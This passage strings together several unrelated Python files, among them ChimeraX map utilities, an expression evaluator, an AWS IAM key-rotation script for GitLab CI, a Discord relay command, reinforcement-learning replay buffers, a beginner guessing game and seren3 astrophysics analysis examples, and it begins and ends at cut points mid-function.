    if error != 0:
        free_dir(path)
        raise Exception("Error on try to get mass")
    mass = get_float_between_ss(exit_binary_text, "Enclosed volume for surface (#1.1) =", "\n")
    free_dir(path)
    return mass
def get_mrc_level(map_path):
    """Get the default contour level ChimeraX assigns when opening a map.

    Opens the map in ``chimerax --nogui`` with a script that immediately
    exits, and parses the "at level ..." value from the startup output.

    :param map_path: path to the density map file
    :return: contour level parsed from ChimeraX output
    :raises Exception: if the ChimeraX subprocess exits with an error
    """
    map_real_path = os.path.abspath(map_path)
    path = gen_dir()
    # Start from a clean scratch directory.
    if os.path.exists(path):
        shutil.rmtree(path)
    os.mkdir(path)
    # Context manager guarantees the script file is closed even on error.
    with open(path + "/fit.cxc", "w+") as f:
        f.write("exit")
    commands_real_path = os.path.abspath(path + "/fit.cxc")
    error, exit_binary_text = get_out("chimerax", "--nogui", map_real_path, commands_real_path)
    if error != 0:
        free_dir(path)
        # BUGFIX: message previously said "mass" (copy-paste from
        # get_mass_angstrom).
        raise Exception("Error on try to get level")
    level = get_float_between_ss(exit_binary_text, "at level", ",")
    free_dir(path)
    return level
def get_cube_len_angstrom(map_path):
    """Return the [xlen, ylen, zlen] box dimensions of a map in angstroms.

    Dumps the map header via ``chimerax --nogui`` and parses the three
    axis lengths from the output.

    :param map_path: path to the density map file
    :return: list ``[x, y, z]`` of box edge lengths
    """
    map_real_path = os.path.abspath(map_path)
    path = gen_dir()
    # Start from a clean scratch directory.
    if os.path.exists(path):
        shutil.rmtree(path)
    os.mkdir(path)
    # Context manager guarantees the script file is closed even on error.
    with open(path + "/fit.cxc", "w+") as f:
        f.write("volume #1 dumpHeader true \r\n")
        f.write("exit")
    commands_real_path = os.path.abspath(path + "/fit.cxc")
    _error, exit_binary_text = get_out("chimerax", "--nogui", map_real_path, commands_real_path)
    x = get_float_value(exit_binary_text, 'xlen =', '\n')
    y = get_float_value(exit_binary_text, 'ylen =', '\n')
    z = get_float_value(exit_binary_text, 'zlen =', '\n')
    free_dir(path)
    return [x, y, z]
|
def can_evaluate(tree):
    """Return True if *tree* is an evaluable expression tree.

    A tree is either a token string (evaluable when it starts with a
    decimal digit) or a list: ``[left, op, right]`` for a binary node, or
    a single-element wrapper ``[subtree]``.

    BUGFIX: the original tested ``len(tree) == 3`` before checking the node
    type, so a 3-character token such as ``"123"`` was walked character by
    character instead of being treated as one numeric token. Checking the
    type first makes token handling uniform (and consistent with
    ``evaluate``).

    :param tree: nested list / string expression tree
    :return: True if every leaf token starts with a decimal digit
    """
    if isinstance(tree, list):
        if len(tree) == 3:
            # Binary node: both operands must be evaluable.
            return can_evaluate(tree[0]) and can_evaluate(tree[2])
        # Wrapper node: unwrap and recurse.
        return can_evaluate(tree[0])
    # Leaf token: evaluable when it begins with a decimal digit.
    return "0" <= tree[0] <= "9"
def evaluate(tree):
    """Evaluate a parsed expression tree to a number.

    Node forms:
      * ``[left, op, right]`` -- binary node; *op* is one of
        ``+ - * / % & | ^``
      * ``[subtree]``          -- wrapper node, unwrapped recursively
      * token string           -- parsed with ``int``

    BUGFIX: the original dispatched on ``len(tree) == 3`` before checking
    the node type, so a 3-character numeric token such as ``"123"`` fell
    into the binary-operator branch, matched no operator, and silently
    returned ``None``. Checking the node type first fixes multi-digit
    tokens.

    :param tree: nested list / string expression tree
    :return: numeric value of the expression (float for ``/``)
    """
    if type(tree) is list:
        if len(tree) == 3:
            lhs, op, rhs = tree
            # Dispatch table replaces the if/elif operator chain.
            operations = {
                "+": lambda a, b: a + b,
                "-": lambda a, b: a - b,
                "*": lambda a, b: a * b,
                "/": lambda a, b: a / b,
                "%": lambda a, b: a % b,
                "&": lambda a, b: a & b,
                "|": lambda a, b: a | b,
                "^": lambda a, b: a ^ b,
            }
            return operations[op](evaluate(lhs), evaluate(rhs))
        if len(tree) == 1:
            return evaluate(tree[0])
    # Leaf token: a numeric string.
    return int(tree)
|
#!/usr/bin/env python
# Copyright 2017 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# Ignore indention messages, since legacy scripts use 2 spaces instead of 4.
# pylint: disable=bad-indentation,docstring-section-indent
# pylint: disable=docstring-trailing-quotes
"""Program to convert power logging config from a servo_ina device
to a sweetberry config.
"""
# Note: This is a py2/3 compatible file.
from __future__ import print_function
import os
import sys
def fetch_records(basename):
  """Import records from servo_ina file.

  servo_ina files are python imports, and have a list of tuples with
  the INA data.

  (inatype, i2caddr, rail name, bus voltage, shunt ohms, mux, True)

  Args:
    basename: python import name (filename -.py)

  Returns:
    list of tuples as described above.
  """
  # The config file is itself a python module exposing an `inas` list.
  config_module = __import__(basename)
  return config_module.inas
def main(argv):
  """Convert a servo_ina config (input.py) into sweetberry .board and
  .scenario files written next to the input.

  Args:
    argv: sys.argv-style list; argv[1] is the input python file.
  """
  if len(argv) != 2:
    print("usage:")
    print(" %s input.py" % argv[0])
    return
  inputf = argv[1]
  basename = os.path.splitext(inputf)[0]
  outputf = basename + '.board'
  outputs = basename + '.scenario'
  print("Converting %s to %s, %s" % (inputf, outputf, outputs))
  inas = fetch_records(basename)
  # Context managers ensure both output files are flushed and closed even
  # if record processing fails (the original never closed them).
  with open(outputf, 'w') as boardfile, open(outputs, 'w') as scenario:
    boardfile.write('[\n')
    scenario.write('[\n')
    start = True
    for rec in inas:
      # Emit a comma separator before every record except the first.
      if start:
        start = False
      else:
        boardfile.write(',\n')
        scenario.write(',\n')
      record = ' {"name": "%s", "rs": %f, "sweetberry": "A", "channel": %d}' % (
        rec[2], rec[4], rec[1] - 64)
      boardfile.write(record)
      scenario.write('"%s"' % rec[2])
    boardfile.write('\n')
    boardfile.write(']')
    scenario.write('\n')
    scenario.write(']')
if __name__ == "__main__":
  # Script entry point: forward the command-line arguments.
  main(sys.argv)
|
import sys
from photon.demo_util.common.context_base import ContextBase
class FailFastDemo:
    """
    Main thread waiting on the 'Fail Fast' event from any other thread.

    All other threads are 'daemons' and will exit when this thread exits.
    """

    def __init__(self, ctx: ContextBase) -> None:
        """
        Args:
            ctx: The Context object.
        """
        # NOTE(review): reads a protected member of ctx -- presumably the
        # shared application logger; consider a public accessor on ContextBase.
        self._logger = ctx._logger
        self._logger.info("FailFast")
        # Event set by any worker thread to request shutdown.
        self._failfast_ev = ctx.failfast_ev
        # Barrier released once all threads are ready to start.
        self._startfast_br = ctx.startfast_br

    def run(self) -> None:
        """
        Run in the main thread.

        Blocks on the start barrier, then on the fail-fast event (or
        Ctrl-C), and always exits the process with status 1 -- killing the
        daemon worker threads with it.
        """
        try:
            self._startfast_br.wait()  # blocks until all threads are ready
            self._logger.info("FailFast running")
            self._failfast_ev.wait()  # blocks until set by any thread
            self._logger.critical("Exiting on a Fail Fast Event")
        except KeyboardInterrupt:
            self._logger.info("Exiting on KeyboardInterrupt")
        finally:
            sys.exit(1)
|
"""
@Author: huuuuusy
@GitHub: https://github.com/huuuuusy
系统: Ubuntu 18.04
IDE: VS Code 1.37
工具: python == 3.7.3
"""
"""
思路:
字典保存每一条记录,然后取出前5进行计算
结果:
执行用时 : 116 ms, 在所有 Python3 提交中击败了15.84%的用户
内存消耗 : 13.9 MB, 在所有 Python3 提交中击败了100%的用户
"""
class Solution:
    def highFive(self, items):
        """Return [ID, top-five-average] pairs sorted by student ID.

        For every student ID in *items* (pairs of [ID, score]), compute the
        integer average of that student's five highest scores.
        """
        scores_by_id = {}
        # Group the scores per student.
        for student_id, score in items:
            scores_by_id.setdefault(student_id, []).append(score)
        # For each student (in ID order) average the five best scores.
        return [
            [student_id, int(sum(sorted(scores_by_id[student_id], reverse=True)[:5]) / 5)]
            for student_id in sorted(scores_by_id)
        ]
if __name__ == "__main__":
    # Sample input (LeetCode 1086): [ID, score] records for two students.
    items = [[1,91],[1,92],[2,93],[2,97],[1,60],[2,77],[1,65],[1,87],[1,100],[2,100],[2,76]]
    answer = Solution().highFive(items)
    print(answer)  # expected: [[1, 87], [2, 88]]
#!/usr/bin/env python
import boto3
import os
import urllib.parse
import urllib.request
def update_gitlab_variable(k, v):
    """PUT a new value for GitLab CI variable *k* on project 2.

    Requires the ``GITLAB_TOKEN`` environment variable for authorization.

    :param k: variable key
    :param v: new variable value
    """
    url = 'https://gitlab.spack.io/api/v4/projects/2/variables/{0}'.format(k)
    payload = urllib.parse.urlencode({'value': v}).encode()
    request = urllib.request.Request(url=url, data=payload, method='PUT')
    request.add_header('Authorization', 'Bearer %s' % os.environ['GITLAB_TOKEN'])
    urllib.request.urlopen(request)
def rotate_iam_keys(iam_user, gitlab_variable_prefix='', protected=True):
    """Rotate AWS IAM access keys for *iam_user* and update GitLab CI.

    Deletes the older of the user's two access keys, creates a fresh one,
    and writes the new id/secret into the corresponding GitLab CI variables.

    :param iam_user: IAM user name whose keys are rotated
    :param gitlab_variable_prefix: prefix for the GitLab variable names
    :param protected: unused here -- TODO confirm whether it should mark
        the GitLab variables as protected
    :raises Exception: if the user has fewer than 2 access keys
    """
    print('Begin IAM key rotation for user "{0}"'.format(iam_user))
    # Get existing keys.
    print('Querying AWS IAM for access keys')
    iam = boto3.client('iam')
    paginator = iam.get_paginator('list_access_keys')
    # NOTE(review): only the last page's metadata is kept; presumably the
    # listing fits on one page (IAM allows at most 2 keys per user).
    for response in paginator.paginate(UserName=iam_user):
        access_keys = response['AccessKeyMetadata']
    num_keys = len(access_keys)
    if num_keys < 2:
        raise Exception('Expected to find 2 keys for {0}, found {1} instead.'.format(iam_user, num_keys))
    # Figure out which of the two access keys is older.
    old_key = None
    if access_keys[0]['CreateDate'] < access_keys[1]['CreateDate']:
        old_key = access_keys[0]
    else:
        old_key = access_keys[1]
    # Delete the old key. It should be safe to do so at this point because it
    # hasn't been used by GitLab since the previous run of this script.
    print('Deleting old IAM access key')
    iam.delete_access_key(
        UserName=iam_user,
        AccessKeyId=old_key['AccessKeyId'])
    # Create a new IAM access key.
    print('Creating new IAM access key')
    response = iam.create_access_key(UserName=iam_user)
    new_key = response['AccessKey']
    # Update GitLab to use this new key.
    print('Updating GitLab to use new IAM access key')
    gitlab_secret_key = '{0}MIRRORS_AWS_SECRET_ACCESS_KEY'.format(gitlab_variable_prefix)
    gitlab_secret_value = new_key['SecretAccessKey']
    update_gitlab_variable(gitlab_secret_key, gitlab_secret_value)
    gitlab_access_id_key = '{0}MIRRORS_AWS_ACCESS_KEY_ID'.format(gitlab_variable_prefix)
    gitlab_access_id_value = new_key['AccessKeyId']
    update_gitlab_variable(gitlab_access_id_key, gitlab_access_id_value)
    print('IAM key rotation for user "{0}" complete!'.format(iam_user))
if __name__ == '__main__':
    # Fail early if the GitLab API token is missing.
    if 'GITLAB_TOKEN' not in os.environ:
        raise Exception('GITLAB_TOKEN environment is not set')
    # Rotate both the PR mirror and the develop mirror credentials.
    rotate_iam_keys('pull-requests-binary-mirror', gitlab_variable_prefix='PR_')
    rotate_iam_keys('develop-binary-mirror')
|
import discord
from Discord.command.Command import *
from Discord.MessageSender import *
from db.function.Tph import *
from db.function.WhInit import *
from db.function.ExistProfil import *
from db.files.data import galonDB
from db.function.ExistWh import *
from db.Player.checkers import *
from db.function.Frequency import *
class Mdj(CtaCommand):
    """Discord command that relays an update transmission to every channel
    tuned to the requested frequency ("cta" or "c15")."""

    def __init__(self, message, bot):
        CtaCommand.__init__(self, message, bot)
        # Allowed values for the first argument (frequency selector).
        self.args1 = {
            "cta": "cta",
            "c15": "c15"
        }

    async def run(self):
        """Validate arguments, broadcast the transmission via webhook to all
        channels on the selected frequency, then delete the trigger message."""
        if not self.has_permission:
            return await self.not_permission()
        try:
            fq = await self.get_args(self.args1, 1)
            chanfq = Frequency(fq).convertChannelsStringToChannelList().searchTph()
            chan_list = chanfq.channels
            # Everything after "<command> <frequency>" is the transmission text.
            transmission = ' '.join(self.message.content.split(' ')[2:])
            assert fq in ["cta", "c15"]
        # BUGFIX: narrowed from a bare ``except:``, which also swallowed
        # SystemExit/KeyboardInterrupt. AssertionError is still caught.
        except Exception:
            return await self.error()
        # Webhook identity (display name + avatar) per frequency.
        avna = {"cta": {"name": "CTA-CODIS-34", "avatar": "https://i.servimg.com/u/f32/11/89/35/34/logo_c11.jpg"},
                "c15": {"name": "Centre 15", "avatar": "https://images.midilibre.fr/api/v1/images/view/5b4608153e45464a454a1f4d/large/image.jpg"}
                }
        for chan in chan_list:
            await MessageSender(self.message, self.bot).wh(
                name=avna[fq]["name"],
                avatar_url=avna[fq]["avatar"],
                msg=f"[**{fq}**] > {transmission}",
                channel=self.message.guild.get_channel(chan)
            )
        await self.message.delete()
|
"""Tests for SRTM module."""
import os
import tempfile
import vcr
import pytest
from geohealthaccess.srtm import SRTM
@pytest.fixture(scope="module")
def unauthentified_srtm():
    """Non-authentified EarthData session (shared across this module)."""
    return SRTM()
@vcr.use_cassette("tests/cassettes/srtm-authenticity-token.yaml")
def test_srtm_authenticity_token(unauthentified_srtm):
    # NOTE(review): the fixture argument is immediately shadowed by a fresh
    # SRTM() -- presumably so the token request is replayed inside this
    # cassette; confirm whether the fixture parameter is needed at all.
    unauthentified_srtm = SRTM()
    assert unauthentified_srtm.authenticity_token.endswith("==")
@vcr.use_cassette("tests/cassettes/srtm-not-logged-in.yaml")
def test_srtm_not_logged_in(unauthentified_srtm):
    """A fresh session must not report as logged in."""
    assert not unauthentified_srtm.logged_in
def test_srtm_spatial_index(unauthentified_srtm):
    """Spatial index should contain all SRTM tiles as valid geometries."""
    sindex = unauthentified_srtm.spatial_index()
    assert len(sindex) == 14295  # total number of SRTMGL1 tiles
    assert sindex.is_valid.all()
    assert "S56W070.SRTMGL1.hgt.zip" in sindex.dataFile.values
def test_srtm_search(unauthentified_srtm, senegal, madagascar):
    """Tile search over country geometries returns the expected tile sets."""
    sen_tiles = unauthentified_srtm.search(senegal)
    mdg_tiles = unauthentified_srtm.search(madagascar)
    assert len(sen_tiles) == 29
    assert len(mdg_tiles) == 75
    assert sorted(mdg_tiles)[0] == "S12E049.SRTMGL1.hgt.zip"
    assert sorted(sen_tiles)[0] == "N12W012.SRTMGL1.hgt.zip"
@vcr.use_cassette("tests/cassettes/srtm-N19W075.yaml", mode="none")
def test_srtm_download():
    """Downloading a tile (replayed from cassette) produces a file on disk."""
    srtm = SRTM()
    TILE = "N19W075.SRTMGL1.hgt.zip"
    with tempfile.TemporaryDirectory(prefix="geohealthaccess_") as tmpdir:
        fpath = srtm.download(TILE, tmpdir)
        assert os.path.isfile(fpath)
@vcr.use_cassette("tests/cassettes/srtm-N12W012.yaml", mode="none")
def test_srtm_download_size():
    """download_size reports the size in bytes of the tile archive."""
    srtm = SRTM()
    TILE = "N12W012.SRTMGL1.hgt.zip"
    assert srtm.download_size(TILE) == 10087801
|
import numpy as np
from collections import deque
import torch
import random
class Buffer:
    """Uniform experience-replay buffer backed by a bounded deque."""

    def __init__(self, buffer_size, device='cpu'):
        # Oldest transitions are evicted automatically once full.
        self.buffer = deque(maxlen=buffer_size)
        self.device = device

    def sample(self, n_samples):
        """Draw *n_samples* transitions uniformly without replacement and
        collate them into tensors on the configured device.

        Returns (states, actions, rewards, next_states, dones) tensors.
        """
        batch = random.sample(self.buffer, n_samples)
        states, actions, rewards, next_states, dones = zip(*batch)
        states = torch.stack(list(states)).to(self.device)
        next_states = torch.stack(list(next_states)).to(self.device)
        actions = torch.Tensor(np.array(actions)).to(self.device)
        rewards = torch.Tensor(np.array(rewards)).to(self.device)
        dones = torch.Tensor(np.array(dones)).to(self.device)
        return states, actions, rewards, next_states, dones

    def __len__(self):
        return len(self.buffer)

    def add(self, state, action, reward, next_state, done):
        """Append one (s, a, r, s', done) transition."""
        self.buffer.append((state, action, reward, next_state, done))
class SumTree:
    """Binary sum-tree for proportional prioritized sampling.

    Leaves hold priorities; every internal node stores the sum of its two
    children, so the root is the total priority mass.
    """

    def __init__(self, mem_size):
        # Flat full binary tree: (mem_size - 1) internal nodes + mem_size leaves.
        self.tree = np.zeros(2 * mem_size - 1)
        self.data = np.zeros(mem_size, dtype=object)
        self.size = mem_size
        self.ptr = 0        # next write position (circular)
        self.nentities = 0  # number of stored entries, capped at size

    def update(self, idx, p):
        """Set priority *p* for leaf *idx* and propagate the delta upward."""
        node = idx + self.size - 1
        delta = p - self.tree[node]
        self.tree[node] += delta
        while node:
            node = (node - 1) // 2
            self.tree[node] += delta

    def store(self, p, data):
        """Insert *data* with priority *p*, overwriting the oldest when full."""
        self.data[self.ptr] = data
        self.update(self.ptr, p)
        self.ptr = (self.ptr + 1) % self.size
        self.nentities = min(self.nentities + 1, self.size)

    def sample(self, value):
        """Descend the tree to the leaf whose cumulative range covers *value*.

        :return: (leaf index, leaf priority, stored data)
        """
        node = 0
        while node < self.size - 1:
            left = 2 * node + 1
            if value < self.tree[left]:
                node = left
            else:
                value -= self.tree[left]
                node = left + 1
        leaf = node - (self.size - 1)
        return leaf, self.tree[node], self.data[leaf]

    @property
    def total_p(self):
        """Total priority mass (root of the tree)."""
        return self.tree[0]

    @property
    def max_p(self):
        """Largest leaf priority."""
        return np.max(self.tree[-self.size:])

    @property
    def min_p(self):
        """Smallest leaf priority."""
        return np.min(self.tree[-self.size:])
class Memory:
    """Simple FIFO replay memory returning un-collated python lists."""

    def __init__(self, max_size):
        self.max_size = max_size
        self.buffer = deque(maxlen=max_size)

    def push(self, state, action, reward, next_state, done):
        """Store one transition; the reward is wrapped in a 1-element array."""
        self.buffer.append((state, action, np.array([reward]), next_state, done))

    def sample(self, batch_size):
        """Uniformly sample *batch_size* transitions into five parallel lists."""
        batch = random.sample(self.buffer, batch_size)
        states, actions, rewards, next_states, dones = (
            list(column) for column in zip(*batch)
        )
        return states, actions, rewards, next_states, dones

    def __len__(self):
        return len(self.buffer)
|
# Here the user gets one chance to guess a number.

# This is the number the user is supposed to guess. It is a so-called
# constant: a variable whose value is fixed, i.e. it never changes and is
# never meant to change. The Python convention is to name constants
# entirely in upper case with words separated by underscores.
SECRET_NUMBER = 87

# The following block asks the user for a number. For Python, every value
# read with input() is by default a string, i.e. text rather than a number.
# With int we tell Python to treat the input as a whole number. That can
# fail, since the user may simply type text anyway, which raises a
# ValueError. To guard against this we attempt (try) the conversion, and if
# it aborts with a ValueError (except ValueError) we inform the user
# instead and end the program early.
try:
    # The \n at the end of the string makes the input appear on the next
    # line.
    user_number = int(input("Errate meine Zahl zwischen 1 und 100!\n"))
except ValueError:
    print("Sorry, das ist ja nicht mal eine Zahl.")
    exit()

# Finally we check whether the user's input matches the secret number and
# print the corresponding message.
if user_number == SECRET_NUMBER:
    print("Richtig!")
else:
    print("Falsch!")
|
########################################## HALOS ##########################################
def amr_halo_average_qty(context, qty, lengh_unit="pc", halo=None):
    '''
    (Volume) average a given AMR quantity over the desired halo's virial
    sphere.

    :param context: seren3 snapshot context providing halos() and array()
    :param qty: name of the AMR field to average (e.g. "rho")
    :param lengh_unit: length unit used for cell widths and halo volume
    :param halo: halo to average over; defaults to the most massive halo
        of a rockstar catalogue
    :return: sum(field * dx**3) / V_halo, the volume-weighted average
    '''
    import numpy as np
    if (halo is None):
        # As an example, here we load a halo catalogue made with rockstar and get
        # the most massive halo from it
        halos = context.halos(finder="rockstar")  # finder = "ahf", "rockstar" or "ctrees" (consistent trees)
        halo = halos.sort("Mvir")[0]  # sorts from massive -> small
    # There is a small bug at the moment where the SimArray conversion context (which contains
    # the scale factor and hubble param.) is not always propagated when operating on the array.
    # So to keep correct unit information for halo volumes, we have to do the following
    halo_volume = halo.sphere.get_volume()
    halo_volume = context.array(halo_volume, halo_volume.units)  # now this array can convert units involving a and h
    dset = halo.g[[qty, "dx"]].flatten()  # load our field and cell-width
    field = dset[qty]
    dx = dset["dx"].in_units(lengh_unit)
    vol = halo_volume.in_units("%s**3" % lengh_unit)
    return np.sum(field * dx**3) / vol
########################################## SIMULATIONS ##########################################
def simulation_example(path, zi=6., name=None):
    '''
    Sometimes, it's useful to start with a simulation object, and then load your snapshot

    :param path: filesystem path of the simulation (used when *name* is None)
    :param zi: target redshift; the closest snapshot output is loaded
    :param name: optional registered simulation name for seren3.load
    '''
    import seren3
    sim = None  # init
    # Load our simulation
    if (name is not None):  # load by name
        sim = seren3.load(name)
    else:
        # Just init from the path
        sim = seren3.init(path)
    # Python 2 print statement -- this module predates Python 3.
    print sim
    # Now, lets load the snapshot which is closest to the desired redshift
    ioutput = sim.redshift(zi)  # output number
    snapshot = sim[ioutput]
    # There are also interpolators for age -> redshift and vice versa, for our chosen cosmology
    age_func = sim.age_func(zmax=100., zmin=0.)
    z_func = sim.redshift_func(zmax=100., zmin=0.)
    age_of_universe = age_func(snapshot.z)
    redshift = z_func(age_of_universe)
    # Round-trip check: redshift should match snapshot.z.
    print snapshot.z, redshift, age_of_universe
########################################## FILTERING ##########################################
def spherical_filter(snapshot, center=None, radius=None):
    '''
    Filter a spherical sub-snapshot from the full volume

    :param snapshot: full snapshot to filter
    :param center: sphere center in box units [0., 1.); defaults to box center
    :param radius: sphere radius in code (box) units; defaults to 0.1
    :return: sub-snapshot restricted to the sphere
    '''
    # Lets just filter a simple spherical sub-volume in the center of our box (supply your own center/radius if you want).
    if (center is None):
        center = [.5, .5, .5]  # center in usual box units of [0., 1.)
    if (radius is None):
        radius = 0.1
    # All values passed to this routine must be in code-length units
    sphere = snapshot.get_sphere(center, radius)
    # Snapshots __getitem__ accepts any pymses.utils.regions object as a filter
    sub_snapshot = snapshot[sphere]
    # Now data access with sub_snapshot in the usual syntax will only return
    # cells/particles in this sub-volume, i.e
    #   dset = sub_snapshot.g["rho"].flatten()
    return sub_snapshot
########################################## GAS ##########################################
def spherical_profile(context, field):
    '''
    Make a spherical profile of this container (can be a snapshot, halo or a subsnap)
    and show it on a log-log plot.

    Parameters
    ----------
    context : snapshot / halo / subsnap exposing the gas family via context.g
    field : str
        Name of the (AMR) field to profile.
    '''
    import matplotlib.pylab as plt

    npoints = int(1e6)  # number of uniform AMR sampling points; int() because 1eX literals are floats
    nbins = 50  # number of radial bins for the profile
    divide_by_counts = True  # True for AMR profiles, False for particle profiles
    prof, r_bins = context.g.bin_spherical(field, npoints, nbins, divide_by_counts=divide_by_counts)

    # plot it
    prof_unit_latex = prof.units.latex()
    r_bins_latex = r_bins.units.latex()
    plt.loglog(r_bins, prof, linewidth=2.)
    plt.xlabel(r"radius [$%s$]" % r_bins_latex)
    # BUG FIX: this was previously a second plt.xlabel call, which overwrote
    # the radius label and left the y axis unlabelled.
    plt.ylabel(r"profile [$%s$]" % prof_unit_latex)
    plt.show()
def splatter_projection_intensive(context):
    '''
    Make a projection of the desired (intensive) field using the splatter engine
    '''
    from seren3.analysis.visualization import engines, operators

    # The splatter engine works on extensive quantities, so an intensive field
    # such as density is wrapped in a mass-weighted operator first.
    field = "rho"
    rho_unit = context.C.kg * context.C.m**-3  # pymses units
    weighted_op = operators.MassWeightedOperator("rho", rho_unit)

    # A MassWeightedSpatterEngine already exists; a CustomSplatterEngine is
    # built here to demonstrate custom engines, which require the operator
    # (and therefore the correct unit) to be supplied explicitly.
    engine = engines.CustomSplatterEngine(context.g, field, weighted_op)  # gas - context.g

    # Camera describing the region to image; raise map_max_size (keep it a
    # power of 2) for a higher resolution map.
    camera = context.camera()
    camera.map_max_size = 2048

    projection = engine.process(camera)
    # save_plot accepts options such as the colormap;
    # run help(projection.save_plot) to see them.
    plot = projection.save_plot()
    plot.show()
def raytracing_projection_extensive(context):
    '''
    Make a projection of the desired (extensive) field using the raytracer
    '''
    from seren3.analysis.visualization import engines

    # Much simpler than the splatter case: the ray-trace engine chooses the
    # operator and unit itself, so a (derived) field name is all that's needed.
    engine = engines.RayTraceEngine(context.g, "nH")

    # Region to image; map_max_size (a power of 2) controls the resolution.
    camera = context.camera()
    camera.map_max_size = 2048

    projection = engine.process(camera)
    # save_plot accepts options such as the colormap;
    # run help(projection.save_plot) to see them.
    plot = projection.save_plot()
    plot.show()
def raytracing_projection_extensive_simple(context):
    '''
    There is a shortcut for simple projections on the Family object
    '''
    from seren3.analysis.visualization import EngineMode  # projection-mode enum

    # Family.projection wires the ray-tracing engine up for us.
    plot = context.g.projection("nH", mode=EngineMode.RAYTRACING).save_plot()
    plot.show()
def compute_fb(context, mass_unit="Msol h**-1"):
    '''
    Computes the baryon fraction for this container.

    Returns
    -------
    (fb, tot_mass) : baryon fraction (gas + stars over everything) and the
        total mass (all particles + gas) in *mass_unit*.
    '''
    import numpy as np

    part_dset = context.p[["id", "mass", "epoch"]].flatten()
    # Star particles: positive id with a non-zero formation epoch (epoch == 0
    # marks dark matter in this scheme).  NOTE(review): particles with id <= 0
    # are excluded here -- presumably tracers/sinks; confirm against the
    # particle bookkeeping.  (The original also built an unused DM index.)
    ix_stars = np.where(np.logical_and(part_dset["id"] > 0., part_dset["epoch"] != 0))

    gas_dset = context.g["mass"].flatten()

    part_mass_tot = part_dset["mass"].in_units(mass_unit).sum()  # all particles (DM + stars)
    star_mass_tot = part_dset["mass"].in_units(mass_unit)[ix_stars].sum()
    gas_mass_tot = gas_dset["mass"].in_units(mass_unit).sum()

    tot_mass = part_mass_tot + gas_mass_tot
    # Baryons are gas + stars; fb = M_baryon / M_total.
    fb = (gas_mass_tot + star_mass_tot) / tot_mass
    return fb, tot_mass
def sample_points_to_cube(context, field, N=128, plot=False):
    '''
    Samples the desired SCALAR field to a cube with N^3 cells.

    Parameters
    ----------
    context : snapshot / halo / subsnap exposing the gas family via context.g
    field : str
        Name of the scalar field to sample.
    N : int
        Cells per side of the output cube.
    plot : bool
        If True, also show a central slice and a z-projection of log10(data).

    Returns
    -------
    (dset, data) : the flat sampled dataset and the same values reshaped
        to an (N, N, N) cube.
    '''
    source = context.g[field] # the SerenSource object
    # First, generate a mesh of points at which to sample the gas.
    # This method generates points spanning the full domain,
    # but you can write your own for sub-regions
    print "Generating point mesh..."
    points = source.generate_uniform_points(N)
    print "Done"
    # Sample at these locations
    print "Sampling AMR grid at specified points..."
    dset = source.sample_points(points)
    print "Done"
    # The resulting array is flattened, but can be reshaped as follows
    data = dset[field].reshape((N,N,N))
    if plot:
        import numpy as np
        import matplotlib.pylab as plt
        from mpl_toolkits.axes_grid1 import make_axes_locatable
        field_units = dset[field].units
        # plot extent: both axes span the full box, labelled in box-size units
        boxsize = context.boxsize
        latex = boxsize.units.latex()
        extent = [0, boxsize, 0, boxsize]
        # Plot a slice and a projection side by side
        fig, axs = plt.subplots(nrows=1, ncols=2, figsize=(10,10))
        im1 = axs[0].imshow(np.log10(data)[:,:,int(N/2)], extent=extent) # slice through centre in z plane
        axs[0].set_title("Slice of field %s" % field, fontsize=16)
        # Fit colorbar to axis
        divider = make_axes_locatable(axs[0])
        cax = divider.append_axes("right", size="5%", pad=0.05)
        cbar1 = plt.colorbar(im1, cax=cax)
        cbar1.set_label(r"log$_{10}$(%s [$%s$])" % (field, field_units.latex()))
        im2 = axs[1].imshow(np.log10(data).sum(axis=2), extent=extent) # projection along z plane (sum of logs)
        axs[1].set_title("Projection of field %s" % field, fontsize=16)
        # Fit colorbar to axis
        divider = make_axes_locatable(axs[1])
        cax = divider.append_axes("right", size="5%", pad=0.05)
        cbar2 = plt.colorbar(im2, cax=cax)
        cbar2.set_label(r"$\sum$ log$_{10}$(%s [$%s$])" % (field, field_units.latex()))
        for ax in axs.flatten():
            ax.set_xlabel(r"x [$%s$]" % latex)
            ax.set_ylabel(r"y [$%s$]" % latex)
        fig.tight_layout()
        plt.show()
    print data.shape
    return dset, data
########################################## STARS ##########################################
# from seren3.analysis.stars.__init__.py
def sfr(context, ret_sSFR=False, nbins=100, **kwargs):
    '''
    Compute the (specific) star formation rate within this context.

    Parameters
    ----------
    context : snapshot / halo / subsnap exposing star particles via context.s
    ret_sSFR : bool
        If True, divide by the total stellar mass to return the specific SFR.
    nbins : int
        Number of age bins for the star formation history.
    **kwargs
        Forwarded to numpy.histogram; 'agerange' ([min, max] in Gyr) is
        consumed here to set the binning range.

    Returns
    -------
    (SFR [Msol Gyr**-1] (or sSFR [Gyr**-1]), lookback time [Gyr], binsize [Gyr])

    Raises
    ------
    NoParticlesException
        If the context contains no star particles.
    '''
    import numpy as np
    from seren3.array import SimArray
    from seren3.exceptions import NoParticlesException
    dset = context.s[["age", "mass"]].flatten()
    age = dset["age"].in_units("Gyr")
    mass = dset["mass"].in_units("Msol")
    if len(age) == 0 or len(mass) == 0:
        raise NoParticlesException("No particles found while computing SFR", 'analysis/stars/sfr')
    def compute_sfr(age, mass, nbins=nbins, **kwargs):
        # Histogram stellar mass against age; weighting by binnorm converts
        # the per-bin mass into a rate.  The 1e-9 factor assumes agerange is
        # in Gyr and yields yr**-1.
        agerange = kwargs.pop('agerange', [age.min(), age.max()])
        binnorm = SimArray(1e-9 * nbins / (agerange[1] - agerange[0]), "yr**-1")
        weights = mass * binnorm
        sfrhist, bin_edges = np.histogram(age, weights=weights, bins=nbins, range=agerange, **kwargs)
        # Bin midpoints and widths for the returned time axis.
        binmps = np.zeros(len(sfrhist))
        binsize = np.zeros(len(sfrhist))
        for i in np.arange(len(sfrhist)):
            binmps[i] = np.mean([bin_edges[i], bin_edges[i + 1]])
            binsize[i] = bin_edges[i + 1] - bin_edges[i]
        return SimArray(sfrhist, "Msol yr**-1"), SimArray(binmps, "Gyr"), SimArray(binsize, "Gyr")
    sfrhist, lookback_time, binsize = compute_sfr(age, mass, **kwargs)
    SFR = sfrhist.in_units("Msol Gyr**-1")
    if ret_sSFR:
        SFR /= mass.sum() # specific star formation rate
    # LaTeX labels used by downstream plotting helpers.
    SFR.set_field_latex("$\\mathrm{SFR}$")
    lookback_time.set_field_latex("$\\mathrm{Lookback-Time}$")
    binsize.set_field_latex("$\Delta$")
